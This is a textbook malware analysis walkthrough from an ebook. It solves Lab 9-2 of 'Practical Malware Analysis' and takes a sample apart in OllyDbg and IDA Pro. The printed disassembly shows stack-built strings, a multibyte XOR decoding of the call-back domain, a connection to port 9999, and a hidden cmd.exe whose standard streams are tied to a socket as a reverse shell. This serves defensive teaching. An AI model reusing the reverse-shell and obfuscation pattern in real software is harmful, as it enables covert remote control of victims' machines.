Table of Contents for
Practical Malware Analysis

Version ebook / Retour

Cover image for bash Cookbook, 2nd Edition Practical Malware Analysis by Andrew Honig Published by No Starch Press, 2012
  1. Cover
  2. Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software
  3. Praise for Practical Malware Analysis
  4. Warning
  5. About the Authors
  6. About the Technical Reviewer
  7. About the Contributing Authors
  8. Foreword
  9. Acknowledgments
  10. Individual Thanks
  11. Introduction
  12. What Is Malware Analysis?
  13. Prerequisites
  14. Practical, Hands-On Learning
  15. What’s in the Book?
  16. 0. Malware Analysis Primer
  17. The Goals of Malware Analysis
  18. Malware Analysis Techniques
  19. Types of Malware
  20. General Rules for Malware Analysis
  21. I. Basic Analysis
  22. 1. Basic Static Techniques
  23. Antivirus Scanning: A Useful First Step
  24. Hashing: A Fingerprint for Malware
  25. Finding Strings
  26. Packed and Obfuscated Malware
  27. Portable Executable File Format
  28. Linked Libraries and Functions
  29. Static Analysis in Practice
  30. The PE File Headers and Sections
  31. Conclusion
  32. Labs
  33. 2. Malware Analysis in Virtual Machines
  34. The Structure of a Virtual Machine
  35. Creating Your Malware Analysis Machine
  36. Using Your Malware Analysis Machine
  37. The Risks of Using VMware for Malware Analysis
  38. Record/Replay: Running Your Computer in Reverse
  39. Conclusion
  40. 3. Basic Dynamic Analysis
  41. Sandboxes: The Quick-and-Dirty Approach
  42. Running Malware
  43. Monitoring with Process Monitor
  44. Viewing Processes with Process Explorer
  45. Comparing Registry Snapshots with Regshot
  46. Faking a Network
  47. Packet Sniffing with Wireshark
  48. Using INetSim
  49. Basic Dynamic Tools in Practice
  50. Conclusion
  51. Labs
  52. II. Advanced Static Analysis
  53. 4. A Crash Course in x86 Disassembly
  54. Levels of Abstraction
  55. Reverse-Engineering
  56. The x86 Architecture
  57. Conclusion
  58. 5. IDA Pro
  59. Loading an Executable
  60. The IDA Pro Interface
  61. Using Cross-References
  62. Analyzing Functions
  63. Using Graphing Options
  64. Enhancing Disassembly
  65. Extending IDA with Plug-ins
  66. Conclusion
  67. Labs
  68. 6. Recognizing C Code Constructs in Assembly
  69. Global vs. Local Variables
  70. Disassembling Arithmetic Operations
  71. Recognizing if Statements
  72. Recognizing Loops
  73. Understanding Function Call Conventions
  74. Analyzing switch Statements
  75. Disassembling Arrays
  76. Identifying Structs
  77. Analyzing Linked List Traversal
  78. Conclusion
  79. Labs
  80. 7. Analyzing Malicious Windows Programs
  81. The Windows API
  82. The Windows Registry
  83. Networking APIs
  84. Following Running Malware
  85. Kernel vs. User Mode
  86. The Native API
  87. Conclusion
  88. Labs
  89. III. Advanced Dynamic Analysis
  90. 8. Debugging
  91. Source-Level vs. Assembly-Level Debuggers
  92. Kernel vs. User-Mode Debugging
  93. Using a Debugger
  94. Exceptions
  95. Modifying Execution with a Debugger
  96. Modifying Program Execution in Practice
  97. Conclusion
  98. 9. OllyDbg
  99. Loading Malware
  100. The OllyDbg Interface
  101. Memory Map
  102. Viewing Threads and Stacks
  103. Executing Code
  104. Breakpoints
  105. Loading DLLs
  106. Tracing
  107. Exception Handling
  108. Patching
  109. Analyzing Shellcode
  110. Assistance Features
  111. Plug-ins
  112. Scriptable Debugging
  113. Conclusion
  114. Labs
  115. 10. Kernel Debugging with WinDbg
  116. Drivers and Kernel Code
  117. Setting Up Kernel Debugging
  118. Using WinDbg
  119. Microsoft Symbols
  120. Kernel Debugging in Practice
  121. Rootkits
  122. Loading Drivers
  123. Kernel Issues for Windows Vista, Windows 7, and x64 Versions
  124. Conclusion
  125. Labs
  126. IV. Malware Functionality
  127. 11. Malware Behavior
  128. Downloaders and Launchers
  129. Backdoors
  130. Credential Stealers
  131. Persistence Mechanisms
  132. Privilege Escalation
  133. Covering Its Tracks—User-Mode Rootkits
  134. Conclusion
  135. Labs
  136. 12. Covert Malware Launching
  137. Launchers
  138. Process Injection
  139. Process Replacement
  140. Hook Injection
  141. Detours
  142. APC Injection
  143. Conclusion
  144. Labs
  145. 13. Data Encoding
  146. The Goal of Analyzing Encoding Algorithms
  147. Simple Ciphers
  148. Common Cryptographic Algorithms
  149. Custom Encoding
  150. Decoding
  151. Conclusion
  152. Labs
  153. 14. Malware-Focused Network Signatures
  154. Network Countermeasures
  155. Safely Investigate an Attacker Online
  156. Content-Based Network Countermeasures
  157. Combining Dynamic and Static Analysis Techniques
  158. Understanding the Attacker’s Perspective
  159. Conclusion
  160. Labs
  161. V. Anti-Reverse-Engineering
  162. 15. Anti-Disassembly
  163. Understanding Anti-Disassembly
  164. Defeating Disassembly Algorithms
  165. Anti-Disassembly Techniques
  166. Obscuring Flow Control
  167. Thwarting Stack-Frame Analysis
  168. Conclusion
  169. Labs
  170. 16. Anti-Debugging
  171. Windows Debugger Detection
  172. Identifying Debugger Behavior
  173. Interfering with Debugger Functionality
  174. Debugger Vulnerabilities
  175. Conclusion
  176. Labs
  177. 17. Anti-Virtual Machine Techniques
  178. VMware Artifacts
  179. Vulnerable Instructions
  180. Tweaking Settings
  181. Escaping the Virtual Machine
  182. Conclusion
  183. Labs
  184. 18. Packers and Unpacking
  185. Packer Anatomy
  186. Identifying Packed Programs
  187. Unpacking Options
  188. Automated Unpacking
  189. Manual Unpacking
  190. Tips and Tricks for Common Packers
  191. Analyzing Without Fully Unpacking
  192. Packed DLLs
  193. Conclusion
  194. Labs
  195. VI. Special Topics
  196. 19. Shellcode Analysis
  197. Loading Shellcode for Analysis
  198. Position-Independent Code
  199. Identifying Execution Location
  200. Manual Symbol Resolution
  201. A Full Hello World Example
  202. Shellcode Encodings
  203. NOP Sleds
  204. Finding Shellcode
  205. Conclusion
  206. Labs
  207. 20. C++ Analysis
  208. Object-Oriented Programming
  209. Virtual vs. Nonvirtual Functions
  210. Creating and Destroying Objects
  211. Conclusion
  212. Labs
  213. 21. 64-Bit Malware
  214. Why 64-Bit Malware?
  215. Differences in x64 Architecture
  216. Windows 32-Bit on Windows 64-Bit
  217. 64-Bit Hints at Malware Functionality
  218. Conclusion
  219. Labs
  220. A. Important Windows Functions
  221. B. Tools for Malware Analysis
  222. C. Solutions to Labs
  223. Lab 1-1 Solutions
  224. Lab 1-2 Solutions
  225. Lab 1-3 Solutions
  226. Lab 1-4 Solutions
  227. Lab 3-1 Solutions
  228. Lab 3-2 Solutions
  229. Lab 3-3 Solutions
  230. Lab 3-4 Solutions
  231. Lab 5-1 Solutions
  232. Lab 6-1 Solutions
  233. Lab 6-2 Solutions
  234. Lab 6-3 Solutions
  235. Lab 6-4 Solutions
  236. Lab 7-1 Solutions
  237. Lab 7-2 Solutions
  238. Lab 7-3 Solutions
  239. Lab 9-1 Solutions
  240. Lab 9-2 Solutions
  241. Lab 9-3 Solutions
  242. Lab 10-1 Solutions
  243. Lab 10-2 Solutions
  244. Lab 10-3 Solutions
  245. Lab 11-1 Solutions
  246. Lab 11-2 Solutions
  247. Lab 11-3 Solutions
  248. Lab 12-1 Solutions
  249. Lab 12-2 Solutions
  250. Lab 12-3 Solutions
  251. Lab 12-4 Solutions
  252. Lab 13-1 Solutions
  253. Lab 13-2 Solutions
  254. Lab 13-3 Solutions
  255. Lab 14-1 Solutions
  256. Lab 14-2 Solutions
  257. Lab 14-3 Solutions
  258. Lab 15-1 Solutions
  259. Lab 15-2 Solutions
  260. Lab 15-3 Solutions
  261. Lab 16-1 Solutions
  262. Lab 16-2 Solutions
  263. Lab 16-3 Solutions
  264. Lab 17-1 Solutions
  265. Lab 17-2 Solutions
  266. Lab 17-3 Solutions
  267. Lab 18-1 Solutions
  268. Lab 18-2 Solutions
  269. Lab 18-3 Solutions
  270. Lab 18-4 Solutions
  271. Lab 18-5 Solutions
  272. Lab 19-1 Solutions
  273. Lab 19-2 Solutions
  274. Lab 19-3 Solutions
  275. Lab 20-1 Solutions
  276. Lab 20-2 Solutions
  277. Lab 20-3 Solutions
  278. Lab 21-1 Solutions
  279. Lab 21-2 Solutions
  280. Index
  281. Index
  282. Index
  283. Index
  284. Index
  285. Index
  286. Index
  287. Index
  288. Index
  289. Index
  290. Index
  291. Index
  292. Index
  293. Index
  294. Index
  295. Index
  296. Index
  297. Index
  298. Index
  299. Index
  300. Index
  301. Index
  302. Index
  303. Index
  304. Index
  305. Index
  306. Index
  307. Updates
  308. About the Authors
  309. Copyright

Lab 9-2 Solutions

Short Answers

  1. The imports and the string cmd are the only interesting strings that appear statically in the binary.

  2. It terminates without doing much.

  3. Rename the file ocl.exe before you run it.

  4. A string is being built on the stack, which is used by attackers to obfuscate strings from simple strings utilities and basic static analysis techniques.

  5. The string 1qaz2wsx3edc and a pointer to a buffer of data are passed to subroutine 0x401089.

  6. The malware uses the domain practicalmalwareanalysis.com.

  7. The malware will XOR the encoded DNS name with the string 1qaz2wsx3edc to decode the domain name.

  8. The malware is setting the stdout, stderr, and stdin handles (used in the STARTUPINFO structure of CreateProcessA) to the socket. Since CreateProcessA is called with cmd as an argument, this will create a reverse shell by tying the command shell to the socket.

Detailed Analysis

We will use dynamic analysis and OllyDbg to analyze this piece of malware in order to determine its functionality. But before we get into debugging, let’s begin by running Strings on the binary. We see the imports and the string cmd. Next, we’ll simply run the binary to see if anything interesting happens.

Based on the process launch and exit in Process Explorer, the process seems to terminate almost immediately. We are definitely going to need to debug this piece to see what’s going on.

When we load the binary into IDA Pro, we see the main function begins at 0x401128. OllyDbg will break at the entry point of the application, but the entry point contains a lot of uninteresting code generated by the compiler, so we’ll set a software breakpoint on main, since we want to focus on it.

Decoding Stack-Formed Strings

If we click the Run button, we hit the first breakpoint at main. The first thing to notice is a large series of mov instructions moving single bytes into local variables beginning at , as shown in Example C-14.

Example C-14. Building an ASCII string on the stack, one character at a time

00401128         push    ebp
00401129         mov     ebp, esp
0040112B         sub     esp, 304h
00401131         push    esi
00401132         push    edi
00401133         mov     [ebp+var_1B0], 31h 
0040113A         mov     [ebp+var_1AF], 71h
00401141         mov     [ebp+var_1AE], 61h
00401148         mov     [ebp+var_1AD], 7Ah
0040114F         mov     [ebp+var_1AC], 32h
00401156         mov     [ebp+var_1AB], 77h
0040115D         mov     [ebp+var_1AA], 73h
00401164         mov     [ebp+var_1A9], 78h
0040116B         mov     [ebp+var_1A8], 33h
00401172         mov     [ebp+var_1A7], 65h
00401179         mov     [ebp+var_1A6], 64h
00401180         mov     [ebp+var_1A5], 63h
00401187         mov     [ebp+var_1A4], 0 
0040118E         mov     [ebp+Str1], 6Fh
00401195         mov     [ebp+var_19F], 63h
0040119C         mov     [ebp+var_19E], 6Ch
004011A3         mov     [ebp+var_19D], 2Eh
004011AA         mov     [ebp+var_19C], 65h
004011B1         mov     [ebp+var_19B], 78h
004011B8         mov     [ebp+var_19A], 65h
004011BF         mov     [ebp+var_199], 0 

This code builds two ASCII strings by moving each character onto the stack followed by NULL terminators at and , which is a popular method for string obfuscation. The obfuscated strings will be referenced by the first variable of the string, which will give us the full NULL-terminated ASCII string. We single-step over these moves to look for signs of these strings being created on the stack in the lower-right pane. We stop executing at 0x4011C6, right-click EBP, and select Follow in Dump. By scrolling up to the first string [EBP-1B0], we can see the string 1qaz2wsx3edc being created. The second string is created at [EBP-1A0] and named ocl.exe.

Filename Check

After these strings are created, we can see a call to GetModuleFileNameA in Example C-15 at , and then a function call within the Lab09-02.exe malware to 0x401550. If we try to analyze this function in OllyDbg, we’ll find that it’s rather complicated. If we examine it in IDA Pro, we’ll see that it is the C runtime library function _strrchr. OllyDbg missed this due to the lack of symbol support. If we load the binary into IDA Pro, we can let IDA Pro use its FLIRT signature detection to correctly identify these APIs, as shown as shown at .

Example C-15. IDA Pro labels strrchr properly, but OllyDbg does not.

00401208     call    ds:GetModuleFileNameA 
0040120E     push    5Ch         ; Ch
00401210     lea     ecx, [ebp+Str]
00401216     push    ecx         ; Str
00401217     call    _strrchr 

Let’s verify this by setting a breakpoint on the call at 0x401217. We can see two arguments being pushed on the stack. The first is a forward slash, and the second is the value being returned from the GetModuleFileNameA call, which would be the current name of the executable. The malware is searching backward for a forward slash (0x5C character) in an attempt to get the name (rather than the full path) of the executable being executed. If we step-over the call to _strrchr, we can see that EAX is pointing to the string \Lab09-02.exe.

The next function call (0x4014C0) reveals a situation similar to _strrchr. IDA Pro identifies this function as _strcmp, as shown in Example C-16.

Example C-16. IDA Pro labels strcmp properly, but OllyDbg does not.

0040121F     mov     [ebp+Str2], eax
00401222     mov     edx, [ebp+Str2]
00401225     add     edx, 1 
00401228     mov     [ebp+Str2], edx
0040122B     mov     eax, [ebp+Str2]
0040122E     push    eax         ; Str2
0040122F     lea     ecx, [ebp+Str1]
00401235     push    ecx         ; Str1
00401236     call    _strcmp

We’ll determine which strings are being compared by setting a breakpoint on the call to _strcmp at 0x401236. Once our breakpoint is hit, we can see the two strings being sent to the _strcmp call. The first is the pointer to the GetModuleFileNameA call (incremented by one at to account for the forward slash), and the other is ocl.exe (our decoded string from earlier). If the strings match, EAX should contain 0, the test eax,eax will set the zero flag to true, and execution will then go to 0x40124C. If the condition is false, it looks like the program will exit, which explains why the malware terminated when we tried to execute it earlier. The malware must be named ocl.exe in order to properly execute.

Let’s rename the binary ocl.exe and set a breakpoint at 0x40124C. If our analysis is correct, the malware should not exit, and our breakpoint will be hit. Success! Our breakpoint was hit, and we can continue our analysis in OllyDbg.

Decoding XOR Encoded Strings

WSAStartup and WSASocket are imported, so we can assume some networking functionality is going to be taking place. The next major function call is at 0x4012BD to the function 0x401089. Let’s set a breakpoint at 0x401089 and inspect the stack for the arguments to this function call.

The two arguments being passed to this function are a stack buffer (encoded string) and the string 1qaz2wsx3edc (key string). We step-into the function and step to the call at 0x401440, which passes the key string to strlen. It returns 0xC and moves it into [EBP-104]. Next, [EBP-108] is initialized to 0. OllyDbg has noted a loop in progress, which makes sense since [EBP-108] is a counter that is incremented at 0x4010DA and compared to 0x20 at 0x4010E3. As the loop continues to execute, we see our key string going through an idiv and mov instruction sequence, as shown Example C-17.

Example C-17. String decoding functionality

004010E3     cmp     [ebp+var_108], 20h
004010EA     jge     short loc_40111D 
004010EC     mov     edx, [ebp+arg_4]
004010EF     add     edx, [ebp+var_108]
004010F5     movsx   ecx, byte ptr [edx]
004010F8     mov     eax, [ebp+var_108]
004010FE     cdq
004010FF     idiv    [ebp+var_104]
00401105     mov     eax, [ebp+Str]
00401108     movsx   edx, byte ptr [eax+edx] 
0040110C     xor     ecx, edx 
0040110E     mov     eax, [ebp+var_108]
00401114     mov     [ebp+eax+var_100], cl
0040111B     jmp     short loc_4010D4

This is getting an index into the string. Notice the use of EDX after the idiv instruction at , which is using modulo to allow the malware to loop over the string in case the encoded string length is longer than our key string. We then see an interesting XOR at .

If we set a breakpoint at 0x4010F5, we can see which value is being pointed to by EDX and being moved into ECX, which will tell us the value that is getting XOR’ed later in the function. When we click Follow in Dump on EDX, we see that this is a pointer to the first argument to this function call (encoded string). ECX will contain 0x46, which is the first byte in the encoded string. We set a breakpoint at to see what is being XOR’ed on the first iteration through the loop. We see that EDX will contain 0x31 (first byte of key string), and we again see that ECX will contain 0x46.

Let’s execute the loop a few more times and try to make sense of the string being decoded. After clicking play a few more times, we can see the string www.prac. This could be the start of a domain that the malware is trying to communicate with. Let’s continue until var_108 ([EBP-108], our counter variable) equals 0x20. Once the jge short 0x40111D at is taken, the final string placed into EAX is www.practicalmalwareanalysis.com (which happens to be of length 0x20), and the function will then return to the main function. This function decoded the string www.practicalmalwareanalysis.com by using a multibyte XOR loop of the string 1qaz2wsx3edc.

Back in the main function, we see EAX being passed to a gethostbyname call. This value will return an IP address, which will populate the sockaddr_in structure.

Next, we see a call to ntohs with an argument of 0x270f, or 9999 in decimal. This argument is moved into a sockaddr_in structure along with 0x2, which represents AF_INET (the code for Internet sockets) in the sockaddr_in structure. The next call will connect the malware to www.practicalmalwareanalysis.com on TCP port 9999. If the connection succeeds, the malware will continue executing until 0x40137A. If it fails, the malware will sleep for 30 seconds, go back to the beginning of the main function, and repeat the process again. We can use Netcat and ApateDNS to fool the malware into connecting back to an IP we control.

If we step-into the function call made at 0x4013a9 (step-into 0x401000), we see two function calls to 0x4013E0. Again, this is another example where OllyDbg does not identify a system call of memset, whereas IDA Pro does identify the function. Next, we see a call to CreateProcessA at 0x40106E, as shown in Example C-18. Before the call, some structure is being populated. We’ll turn to IDA Pro to shed some light on what’s going on here.

Reverse Shell Analysis

This appears to be a reverse shell, created using a method that’s popular among malware authors. In this method, the STARTUPINFO structure that is passed to CreateProcessA is manipulated. CreateProcessA is called, and it runs cmd.exe with its window suppressed, so that it isn’t visible to the user under attack. Before the call to CreateProcessA, a socket is created and a connection is established to a remote server. That socket is tied to the standard streams (stdin, stdout, and stderr) for cmd.exe.

Example C-18 shows this method of reverse shell creation in action.

Example C-18. Creating a reverse shell using CreateProcessA and the STARTUPINFO structure

0040103B     mov     [ebp+StartupInfo.wShowWindow], SW_HIDE 
00401041     mov     edx, [ebp+Socket]
00401044     mov     [ebp+StartupInfo.hStdInput], edx 
00401047     mov     eax, [ebp+StartupInfo.hStdInput]
0040104A     mov     [ebp+StartupInfo.hStdError], eax 
0040104D     mov     ecx, [ebp+StartupInfo.hStdError]
00401050     mov     [ebp+StartupInfo.hStdOutput], ecx 
00401053     lea     edx, [ebp+ProcessInformation]
00401056     push    edx         ; lpProcessInformation
00401057     lea     eax, [ebp+StartupInfo]
0040105A     push    eax         ; lpStartupInfo
0040105B     push    0           ; lpCurrentDirectory
0040105D     push    0           ; lpEnvironment
0040105F     push    0           ; dwCreationFlags
00401061     push    1           ; bInheritHandles
00401063     push    0           ; lpThreadAttributes
00401065     push    0           ; lpProcessAttributes
00401067     push    offset CommandLine ; "cmd" 
0040106C     push    0           ; lpApplicationName
0040106E     call    ds:CreateProcessA

The STARTUPINFO structure is manipulated, and then parameters are passed to CreateProcessA. We see that CreateProcessA is going to run cmd.exe because it is passed as a parameter at . The wShowWindow member of the structure is set to SW_HIDE at , which will hide cmd.exe’s window when it is launched. At , , and , we see that the standard streams in the STARTUPINFO structure are set to the socket. This directly ties the standard streams to the socket for cmd.exe, so when it is launched, all of the data that comes over the socket will be sent to cmd.exe, and all output generated by cmd.exe will be sent over the socket.

In summary, we determined that this malware is a simple reverse shell with obfuscated strings that must be renamed ocl.exe before it can be run successfully. The strings are obfuscated using the stack and a multibyte XOR. In Chapter 13, we will cover data-encoding techniques like this in more detail.